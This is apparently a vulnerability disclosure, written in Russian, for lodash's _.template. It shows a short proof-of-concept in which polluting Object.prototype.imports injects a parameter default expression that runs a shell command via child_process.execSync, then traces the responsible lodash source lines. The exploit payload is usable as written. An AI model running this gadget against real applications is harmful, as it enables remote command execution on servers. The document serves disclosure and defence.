
Proof-of-concept, демонстрирующий удалённое выполнение кода в шаблоне lodash через загрязнение прототипа, с подробным анализом хода атаки и техники эксплуатации.
https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc
const _ = require('lodash');
Object.prototype.imports = {'x=process.getBuiltinModule("child_process").execSync("curl https://example.com")':undefined}
_.template('', {});

Использование ранее существующей уязвимости загрязнения прототипа для загрязнения Object.prototype.imports свойством, контролируемым атакующим
Затем вызывается _.template('', {}) с обычным значением опций в виде простого объекта
Внутри _.template() lodash копирует options с помощью в
assignInWith({}, options, settings, ...)function template(string, options, guard) {
// Based on John Resig's `tmpl` implementation
// (http://ejohn.org/blog/javascript-micro-templating/)
// and Laura Doktorova's doT.js (https://github.com/olado/doT).
var settings = lodash.templateSettings;
if (guard && isIterateeCall(string, options, guard)) {
options = undefined;
}
string = toString(string);
options = assignInWith({}, options, settings, customDefaultsAssignIn);
...
assignInWith использует keysIn(source) в lodash.js:12778 var assignInWith = createAssigner(function(object, source, srcIndex, customizer) {
copyObject(source, keysIn(source), object, customizer);
});
keysIn() включает унаследованные перечисляемые свойства в lodash.js:13440 function keysIn(object) {
return isArrayLike(object) ? arrayLikeKeys(object, true) : baseKeysIn(object);
}
Поскольку объект options является обычным {}, он наследует загрязнённое свойство imports от Object.prototype, и lodash копирует это унаследованное значение в локальный options.imports
Затем lodash создаёт imports с помощью assignInWith({}, options.imports, settings.imports, ...) в lodash.js:14889, извлекает importsKeys в lodash.js:14889 и передаёт их в Function(importsKeys, ...) в lodash.js:14957
...
// Cleanup code by stripping empty strings.
source = (isEvaluating ? source.replace(reEmptyStringLeading, '') : source)
.replace(reEmptyStringMiddle, '$1')
.replace(reEmptyStringTrailing, '$1;');
// Frame code as the function body.
source = 'function(' + (variable || 'obj') + ') {\n' +
(variable
? ''
: 'obj || (obj = {});\n'
) +
"var __t, __p = ''" +
(isEscaping
? ', __e = _.escape'
: ''
) +
(isEvaluating
? ', __j = Array.prototype.join;\n' +
"function print() { __p += __j.call(arguments, '') }\n"
: ';\n'
) +
source +
'return __p\n}';
var result = attempt(function() {
return Function(importsKeys, sourceURL + 'return ' + source)
.apply(undefined, importsValues);
});
...
Мой загрязнённый ключ обрабатывается как формальный параметр с выражением по умолчанию:
x=process.getBuiltinModule("child_process").execSync("curl https://example.com")